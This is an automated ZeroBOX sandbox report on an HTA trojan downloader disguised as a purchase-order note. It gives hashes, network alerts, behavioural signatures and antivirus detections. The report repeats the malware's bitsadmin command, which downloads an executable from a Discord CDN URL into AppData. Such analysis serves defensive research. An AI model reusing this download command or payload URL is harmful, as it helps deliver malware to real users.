Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 23, 2023, 5:13 p.m.	May 23, 2023, 5:17 p.m.

Size	976.0B
Type	HTML document, ASCII text, with CRLF line terminators
MD5	`dada4c04af88637d79abfec8ed74e568`
SHA256	`667561ab07beadb79120d3548d12417c66187ab72ee18ce4fa659a3c897e4fe1`
CRC32	`6C53DABB`
ssdeep	`24:hMNmMvy4GqptEIjb18qee0rp8xuY8yu5yNHRSBl88e/ZM8E4olEC:ImMqopOIjb1p0rd4ucNHRSoyt40F`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\2022_12_PO-note_page-0002.hta
2556
- bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe
  2656

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.133.233

IP Address	Status	Action
162.159.129.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49163 -> 162.159.129.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
TCP 192.168.56.101:49163 -> 162.159.129.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49163 -> 162.159.129.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49163 -> 162.159.129.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49163 -> 162.159.129.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity

Suricata TLS

No Suricata TLS

Command line console output was observed (34 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: BITSADMIN version 3.0 [ 7.5.7601 ] console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: BITS administration utility. console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: (C) Copyright 2000-2006 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: ERROR console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: NORMAL console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: Unable to complete transfer. console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: ERROR FILE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: https://cdn.discordapp.com/attachments/1062280171790540840/10630 console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: ERROR CODE: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: 0x80072f7d - 보안 채널 지원에서 오류가 발생했습니다. console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: ERROR CONTEXT: console_handle: 0x00000007	1	1
WriteConsoleW May 23, 2023, 5:13 p.m.	buffer: 0x00000005 - 원격 파일을 처리하는 동안 오류가 발생했습니다. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 23, 2023, 5:13 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (16 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x040e2000 process_handle: 0xffffffff	1

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 23, 2023, 5:13 p.m.	show_type: 0 filepath_r: bitsadmin parameters: /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe filepath: bitsadmin	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 23, 2023, 5:13 p.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x040e0000 process_handle: 0xffffffff	1	0	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	bitsadmin /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe
cmdline	"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Lionic	Trojan.Script.Alien.4!c
DrWeb	VBS.DownLoader.2666
FireEye	Trojan.GenericKD.64953680
VIPRE	Trojan.GenericKD.64953680
Sangfor	Trojan.Generic-Script.Save.dad56280
Arcabit	Trojan.Generic.D3DF1D50
Cyren	JS/Agent.ATW!Eldorado
Symantec	CL.Downloader!gen92
ESET-NOD32	VBS/TrojanDownloader.Agent.WUN
Avast	Script:SNH-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	Trojan.GenericKD.64953680
MicroWorld-eScan	Trojan.GenericKD.64953680
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:F97ZczZOAr)
Emsisoft	Trojan.GenericKD.64953680 (B)
Ikarus	Trojan-Downloader.VBS.Agent
Avira	VBS/Dldr.Agent.VPDI
Microsoft	TrojanDownloader:VBS/Tnega.RVD!MTB
GData	Trojan.GenericKD.64953680
Google	Detected
ALYac	Trojan.GenericKD.64953680
Tencent	Vbs.Trojan-Downloader.Der.Sgil
MAX	malware (ai score=85)
Fortinet	VBS/Agent.VHJ!tr.dldr
AVG	Script:SNH-gen [Trj]

2022_12_PO-note_page-0002.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All